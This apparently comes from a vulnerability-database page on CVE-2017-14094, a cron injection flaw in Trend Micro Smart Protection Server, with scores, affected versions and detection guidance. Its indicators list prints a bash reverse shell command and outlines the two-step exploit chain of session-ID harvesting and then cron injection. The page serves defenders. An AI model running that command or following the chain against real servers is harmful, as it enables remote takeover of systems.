cbcvebase.
CVE-2017-14094
published 2018-01-19

CVE-2017-14094: A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a…

PriorityP274critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
19.37%
97.0th percentile
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a cron job injection on a vulnerable system.

Affected

2 ranges
VendorProductVersion rangeFixed in
trend_microtrend_micro_smart_protection_server
trendmicrosmart_protection_server<= 3.2

Detection & IOCsextracted from sources · hover to see the quote

path/widget/repository/log/diagnostic.log
path/var/spool/cron/webserv
path/var/www/AdminUI/php/admin_update_program.php
path/var/www/AdminUI/php/inc/crontab.php
urlhttps://<host>:<port>/widget/repository/log/diagnostic.log
urlhttps://<host>:<port>/php/admin_update_program.php?sid=<session_id>
command* * * * * %s #
commandbash -i >& /dev/tcp/192.168.45.80/8888 0>&1
port4343
port8888
path/widget/inc/widget_package_manager.php
  • Monitor for unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log, which leaks active session IDs from diagnostic logs and is the first stage of the exploit chain.
  • Detect HTTP POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron injection patterns such as '* * * * *' or shell metacharacters (e.g., '#', ';', '|').
  • Alert on creation or modification of /var/spool/cron/webserv, especially if the cron entry contains shell commands or reverse shell payloads injected via the hidTimingMin field.
  • Detect the presence of 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST /php/admin_update_program.php as a confirmation indicator that a malicious cron job was successfully injected.
  • Monitor for outbound bash reverse shell connections (e.g., /dev/tcp/<attacker_ip>/<port>) spawned by the webserv user, which indicates successful cron job injection exploitation.
  • Each log entry in diagnostic.log leaks the session ID in the 4th comma-delimited field; monitor for automated parsing of this file (rapid sequential GET requests) as a sign of session harvesting.
  • ·The exploit chain requires two steps: first, unauthenticated session ID harvesting from the exposed diagnostic log, then authenticated POST to the cron injection endpoint. Blocking unauthenticated access to /widget/repository/log/diagnostic.log breaks the chain for unauthenticated attackers.
  • ·Only Trend Micro Smart Protection Server 3.2 (Build 1085) was confirmed tested; other versions may also be affected but were not verified.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.